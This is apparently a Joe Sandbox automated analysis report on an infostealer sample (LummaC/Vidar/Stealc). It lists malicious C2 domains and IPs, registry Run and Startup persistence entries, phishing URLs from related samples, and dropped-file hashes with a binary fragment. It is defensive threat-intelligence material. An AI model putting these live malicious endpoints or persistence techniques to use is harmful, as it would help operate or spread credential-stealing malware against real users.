https://steamcommunity.com/market/	RegAsm.exe, 00000003.00000002.2974075662.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3002340946.0000000000FAD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/news/	RegAsm.exe, 00000003.00000002.2974075662.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3002340946.0000000000FAD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	IJEGDB.3.dr	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	GCGHCB.3.dr	false	URL Reputation: safe	unknown
http://store.steampowered.com/subscriber_agreement/	RegAsm.exe, 00000003.00000002.2974075662.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3002340946.0000000000FAD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	RegAsm.exe, 00000003.00000002.2974075662.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3002340946.0000000000FAD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1	RegAsm.exe, 00000003.00000002.2974075662.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3002340946.0000000000FAD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.189.2	performenj.shop	United States	13335	CLOUDFLARENETUS	true
172.67.162.108	drawzhotdog.shop	United States	13335	CLOUDFLARENETUS	true
188.114.97.3	fragnantbui.shop	European Union	13335	CLOUDFLARENETUS	true
172.67.132.32	gutterydhowi.shop	United States	13335	CLOUDFLARENETUS	true
188.114.96.3	offensivedzvju.shop	European Union	13335	CLOUDFLARENETUS	true
104.102.49.254	steamcommunity.com	United States	16625	AKAMAI-ASUS	true
147.45.44.104	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	false
5.75.211.162	unknown	Germany	24940	HETZNER-ASDE	true
45.132.206.251	cowod.hopto.org	Russian Federation	59731	LIFELINK-ASRU	true
172.67.74.152	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
172.67.208.139	reinforcenh.shop	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1518461
Start date and time:	2024-09-25 17:59:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	31
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@30/1065@14/11
EGA Information:	Successful, ratio: 57.1%
HCA Information:	Successful, ratio: 100% Number of executed functions: 93 Number of non-executed functions: 222
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.65.92
Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target AFIDGDBGCA.exe, PID 1732 because it is empty
Execution Graph export aborted for target FDWDZ.exe, PID 4352 because it is empty
Execution Graph export aborted for target MFDBG.exe, PID 5248 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtFsControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
12:00:28	API Interceptor	2x Sleep call for process: RegAsm.exe modified
12:01:00	API Interceptor	1x Sleep call for process: AFIDGDBGCA.exe modified
12:01:01	API Interceptor	1151x Sleep call for process: MFDBG.exe modified
12:01:59	API Interceptor	2x Sleep call for process: WerFault.exe modified
18:01:03	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MFDBG_53e62ee1f55449c09d35238cb5fcef52 C:\Users\user\AppData\Local\Temp\Malewmf\MFDBG.exe
18:01:15	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MFDBG_53e62ee1f55449c09d35238cb5fcef52 C:\Users\user\AppData\Local\Temp\Malewmf\MFDBG.exe
18:01:31	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_9462fb30971346cbbb29a09df630ea1e.lnk
18:01:47	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_cdd0375322dc48738e770e5624bf6a27.lnk
18:02:03	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_45b30cbe6e2a498db954574dac67e637.lnk
18:02:18	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_ff62bdcaefb94ca7be7e922d95224cd3.lnk
18:02:39	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_daa16c9617144e47826751986202a847.lnk
18:02:54	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_89f61e6afd78478fa9de64f94538818f.lnk
18:03:09	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_9c18fd29e3f54d9dba1e041402f1cab3.lnk
18:03:30	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_574798ca634540d0ac4fec20b90d0247.lnk
18:03:46	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_e72484df0e564f8290ff65efbfa15e36.lnk
18:04:08	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_2c6337ec4ceb449b99822e5f2115df1c.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.189.2	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	Suselx1.exe	Get hash	malicious	LummaC	Browse
	gkqg90.ps1	Get hash	malicious	LummaC	Browse
	Res.ps1	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	SecuriteInfo.com.Win32.PWSX-gen.716.1862.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
172.67.162.108	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	SecuriteInfo.com.Win32.PWSX-gen.716.1862.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
188.114.97.3	PO5118000306 pdf.exe	Get hash	malicious	FormBook	Browse	www.rtprajalojago.live/2wnz/
	(PO403810)_VOLEX_doc.exe	Get hash	malicious	Lokibot	Browse	dddotx.shop/Mine/PWS/fre.php
	QUOTATION_SEPQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/DiF66Hbf/download
	http://easyantrim.pages.dev/id.html	Get hash	malicious	HTMLPhisher	Browse	easyantrim.pages.dev/id.html
	QUOTATION_SEPQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/13rSMZZi/download
	Purchase Order_ AEPL-2324-1126.exe	Get hash	malicious	FormBook	Browse	www.rtpngk.xyz/yhsl/
	PO-001.exe	Get hash	malicious	FormBook	Browse	www.x0x9x8x8x7x6.shop/assb/
	PO2024033194.exe	Get hash	malicious	FormBook	Browse	www.cc101.pro/4hfb/
	ADNOC REQUESTS & reviews.exe	Get hash	malicious	FormBook	Browse	www.chinaen.org/zi4g/
	updater.exe	Get hash	malicious	Unknown	Browse	microsoft-rage.world/Api/v3

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
gutterydhowi.shop	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.132.32
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.132.32
	ACeTKO93e9.exe	Get hash	malicious	LummaC	Browse	172.67.132.32
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.4.136
	SecuriteInfo.com.Win32.PWSX-gen.716.1862.exe	Get hash	malicious	LummaC	Browse	172.67.132.32
performenj.shop	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.189.2
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.189.2
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.189.2
	Suselx1.exe	Get hash	malicious	LummaC	Browse	172.67.189.2
	gkqg90.ps1	Get hash	malicious	LummaC	Browse	172.67.189.2
	009.ps1	Get hash	malicious	LummaC	Browse	104.21.51.224
	ir57.ps1	Get hash	malicious	LummaC	Browse	104.21.51.224
	ueu7.exe	Get hash	malicious	LummaC	Browse	104.21.51.224
	opqg.ps1	Get hash	malicious	LummaC	Browse	104.21.51.224
	Info.ps1	Get hash	malicious	LummaC	Browse	104.21.51.224
fragnantbui.shop	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3
	ACeTKO93e9.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.96.3
	SecuriteInfo.com.Win32.PWSX-gen.716.1862.exe	Get hash	malicious	LummaC	Browse	188.114.96.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.208.139
	message.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://osoulksa.com/c/Fidelityme	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	https://docu.lafolieduocehotels.com/document/?top=cyndie.winger@steptoe-johnson.com	Get hash	malicious	HTMLPhisher	Browse	172.67.183.61
	http://rkanet.com	Get hash	malicious	Unknown	Browse	104.17.25.14
	NTGcon.msi	Get hash	malicious	Unknown	Browse	104.16.77.47
	electrum-hmstr-3.2.5-portable.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	https://us-west-2.protection.sophos.com/?d=guyr00fing.com&u=aHR0cHM6Ly9ndXlyMDBmaW5nLmNvbS9qVndXa05QeS9jMjlqUUdOMGJYTnBkQzVqYjIwPQ==&p=m&i=NjI3Mjc4OTk0MGU3YTAxM2U2ZWIxMDZj&t=N0VSZ0JVYTRmci9PeEg5aDFwS0g5NjZXYkVsaWQ1L21rRUkwQ2l3c1RoUT0=&h=fd815cbc911944b3b275a46897ab06ef&s=AVNPUEhUT0NFTkNSWVBUSVajjTLgPqhT66av3vHX2i2H6lUai4tj78AtogmBq_V0eA	Get hash	malicious	Unknown	Browse	104.21.29.115
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.74.152
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.208.139
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.208.139
	message.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://osoulksa.com/c/Fidelityme	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	https://docu.lafolieduocehotels.com/document/?top=cyndie.winger@steptoe-johnson.com	Get hash	malicious	HTMLPhisher	Browse	172.67.183.61
	http://rkanet.com	Get hash	malicious	Unknown	Browse	104.17.25.14
	NTGcon.msi	Get hash	malicious	Unknown	Browse	104.16.77.47
	electrum-hmstr-3.2.5-portable.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	https://us-west-2.protection.sophos.com/?d=guyr00fing.com&u=aHR0cHM6Ly9ndXlyMDBmaW5nLmNvbS9qVndXa05QeS9jMjlqUUdOMGJYTnBkQzVqYjIwPQ==&p=m&i=NjI3Mjc4OTk0MGU3YTAxM2U2ZWIxMDZj&t=N0VSZ0JVYTRmci9PeEg5aDFwS0g5NjZXYkVsaWQ1L21rRUkwQ2l3c1RoUT0=&h=fd815cbc911944b3b275a46897ab06ef&s=AVNPUEhUT0NFTkNSWVBUSVajjTLgPqhT66av3vHX2i2H6lUai4tj78AtogmBq_V0eA	Get hash	malicious	Unknown	Browse	104.21.29.115
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.74.152
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.208.139
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.208.139
	message.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://osoulksa.com/c/Fidelityme	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	https://docu.lafolieduocehotels.com/document/?top=cyndie.winger@steptoe-johnson.com	Get hash	malicious	HTMLPhisher	Browse	172.67.183.61
	http://rkanet.com	Get hash	malicious	Unknown	Browse	104.17.25.14
	NTGcon.msi	Get hash	malicious	Unknown	Browse	104.16.77.47
	electrum-hmstr-3.2.5-portable.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	https://us-west-2.protection.sophos.com/?d=guyr00fing.com&u=aHR0cHM6Ly9ndXlyMDBmaW5nLmNvbS9qVndXa05QeS9jMjlqUUdOMGJYTnBkQzVqYjIwPQ==&p=m&i=NjI3Mjc4OTk0MGU3YTAxM2U2ZWIxMDZj&t=N0VSZ0JVYTRmci9PeEg5aDFwS0g5NjZXYkVsaWQ1L21rRUkwQ2l3c1RoUT0=&h=fd815cbc911944b3b275a46897ab06ef&s=AVNPUEhUT0NFTkNSWVBUSVajjTLgPqhT66av3vHX2i2H6lUai4tj78AtogmBq_V0eA	Get hash	malicious	Unknown	Browse	104.21.29.115
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.74.152
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.208.139
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.208.139
	message.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://osoulksa.com/c/Fidelityme	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	https://docu.lafolieduocehotels.com/document/?top=cyndie.winger@steptoe-johnson.com	Get hash	malicious	HTMLPhisher	Browse	172.67.183.61
	http://rkanet.com	Get hash	malicious	Unknown	Browse	104.17.25.14
	NTGcon.msi	Get hash	malicious	Unknown	Browse	104.16.77.47
	electrum-hmstr-3.2.5-portable.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	https://us-west-2.protection.sophos.com/?d=guyr00fing.com&u=aHR0cHM6Ly9ndXlyMDBmaW5nLmNvbS9qVndXa05QeS9jMjlqUUdOMGJYTnBkQzVqYjIwPQ==&p=m&i=NjI3Mjc4OTk0MGU3YTAxM2U2ZWIxMDZj&t=N0VSZ0JVYTRmci9PeEg5aDFwS0g5NjZXYkVsaWQ1L21rRUkwQ2l3c1RoUT0=&h=fd815cbc911944b3b275a46897ab06ef&s=AVNPUEhUT0NFTkNSWVBUSVajjTLgPqhT66av3vHX2i2H6lUai4tj78AtogmBq_V0eA	Get hash	malicious	Unknown	Browse	104.21.29.115
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.74.152
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.208.139

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.96.3
	https://osoulksa.com/c/Fidelityme	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	http://rkanet.com	Get hash	malicious	Unknown	Browse	188.114.96.3
	NTGcon.msi	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.96.3
	Halkbank_Ekstre_22#U202693.25.09.24.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	setup.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	AS5AB7c08n.exe	Get hash	malicious	MicroClip	Browse	188.114.96.3
	file.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
51c64c77e60f3980eea90869b68c58a8	file.exe	Get hash	malicious	LummaC, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	5.75.211.162
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.189.2 172.67.162.108 188.114.97.3 172.67.132.32 188.114.96.3 104.102.49.254 172.67.208.139
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.189.2 172.67.162.108 188.114.97.3 172.67.132.32 188.114.96.3 104.102.49.254 172.67.208.139
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.189.2 172.67.162.108 188.114.97.3 172.67.132.32 188.114.96.3 104.102.49.254 172.67.208.139
	DHL Receipt_AWB811070484778.xls	Get hash	malicious	Unknown	Browse	172.67.189.2 172.67.162.108 188.114.97.3 172.67.132.32 188.114.96.3 104.102.49.254 172.67.208.139
	KTh1gQlT9a.exe	Get hash	malicious	SmokeLoader	Browse	172.67.189.2 172.67.162.108 188.114.97.3 172.67.132.32 188.114.96.3 104.102.49.254 172.67.208.139
	ptgl503.exe	Get hash	malicious	LummaC	Browse	172.67.189.2 172.67.162.108 188.114.97.3 172.67.132.32 188.114.96.3 104.102.49.254 172.67.208.139
	Suselx1.exe	Get hash	malicious	LummaC	Browse	172.67.189.2 172.67.162.108 188.114.97.3 172.67.132.32 188.114.96.3 104.102.49.254 172.67.208.139
	gkqg90.ps1	Get hash	malicious	LummaC	Browse	172.67.189.2 172.67.162.108 188.114.97.3 172.67.132.32 188.114.96.3 104.102.49.254 172.67.208.139
	009.ps1	Get hash	malicious	LummaC	Browse	172.67.189.2 172.67.162.108 188.114.97.3 172.67.132.32 188.114.96.3 104.102.49.254 172.67.208.139
	ir57.ps1	Get hash	malicious	LummaC	Browse	172.67.189.2 172.67.162.108 188.114.97.3 172.67.132.32 188.114.96.3 104.102.49.254 172.67.208.139
37f463bf4616ecd445d4a1937da06e19	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.102.49.254
	Zeskanowana lista przedmiot#U00f3w nr 84329.vbs	Get hash	malicious	FormBook, GuLoader	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.102.49.254
	SDWLLRJcsY.exe	Get hash	malicious	Remcos, GuLoader	Browse	104.102.49.254
	D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe	Get hash	malicious	FormBook, GuLoader	Browse	104.102.49.254
	cDErPwSuCB.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	tpq.ps1	Get hash	malicious	Unknown	Browse	104.102.49.254
	Kv1tZKstAC.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	z65orderrequest.bat.exe	Get hash	malicious	GuLoader, Remcos	Browse	104.102.49.254

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\AFIDGDBGCA.exe	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
C:\ProgramData\BFIIEHJDBK.exe	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	26112
Entropy (8bit):	5.587298385417451
Encrypted:	false
SSDEEP:	768:0Z7bBiDrq+NhJvjhTxhi8DD08T10DnS1RW:0ZErqqTxhZDA8TKS1RW
MD5:	168087C84C5FF3664E5E2F4EEC18D7DD
SHA1:	639E9E87103F576617ED08C50910CA92FE5C8C5B
SHA-256:	2A7CDB79045658B9C02EBBB159E5B3680D7D6D832DBD757572F7D202C3FA935D
SHA-512:	89491261E1234F917964566DEF4B1A50505BA4C2EB90D14C19E2130D78FE65CD61C4BBA685909109C7088B35E7FD48F6311ACE7A0DD8C703A6D1B1D23D1A54BB
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 11%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p............"...0..\...........{... ........@.. ....................................`.................................h{..S.................................................................................... ............... ..H............text....[... ...\.................. ..`.rsrc................^..............@..@.reloc...............d..............@..B.................{......H.......tC...7............................................................((....s..........(3...2.{....(....2.{....(....6.\|.....(4...6.\|.....(4...6.\|.....(4...R.sE...%oF....`oG...F.(H...(I...(...+..oM...%:....&.(N....{.....oO...Z.{ ...r...p(....(Z...2.{"...(=...6.\|$....(4...6.\|(....(4...6.\|,....(4...6.\|4....(4...6.\|7....(4....(g...(...+.r...p(.....:...r/..p(.....;...sl....<...6.\|@....(4...6.\|G....(4...6.\|Q....(....6.\|T....(....6.\|X....(4...6.\|]....(4

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9334593914162794
Encrypted:	false
SSDEEP:	192:Zp/o9TB70BU/JNea6DkzuiFUZ24IO8Jo:vo9TOBU/JNea+kzuiFUY4IO8Jo
MD5:	D07BC37D6916F9983A26501BAC3ED735
SHA1:	B163F930CFDEF2749DC1151DB13E95E783708770
SHA-256:	31C663024A2A139B02216D4D1EA7488807317FD1CDEA0213ECE9265ED18A9D98
SHA-512:	0A1D9F466AEB3FFF0B33C6AF183073329E3A280D6EB111EF0AAB3F360FF6A1E1900A47FC48E390B2E18AD7A51BE59208259B82CB082146C0E248B29980D088C3
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.7.5.3.6.7.7.0.3.8.6.1.1.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.7.5.3.6.8.0.0.3.8.6.0.4.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.e.2.b.0.d.9.5.-.f.c.9.8.-.4.5.1.a.-.8.9.0.6.-.6.9.b.5.0.f.3.e.3.0.c.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.b.6.f.4.a.d.c.-.d.a.0.1.-.4.d.2.b.-.b.0.8.c.-.a.b.e.b.4.3.4.3.8.0.6.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.M.F.D.B.G...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.I.D.S.M...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.7.0.-.0.0.0.1.-.0.0.1.4.-.e.3.4.c.-.a.9.2.5.6.4.0.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.a.1.9.7.6.b.b.9.f.e.0.7.a.6.c.7.6.7.1.3.d.6.a.4.1.1.0.b.7.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.6.3.9.e.9.e.8.7.1.0.3.f.5.7.6.6.1.7.e.d.0.8.c.5.0.9.1.0.c.a.9.2.f.e.5.c.8.c.5.b.!.M.F.D.B.

Process:	C:\Users\user\Desktop\file.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	true
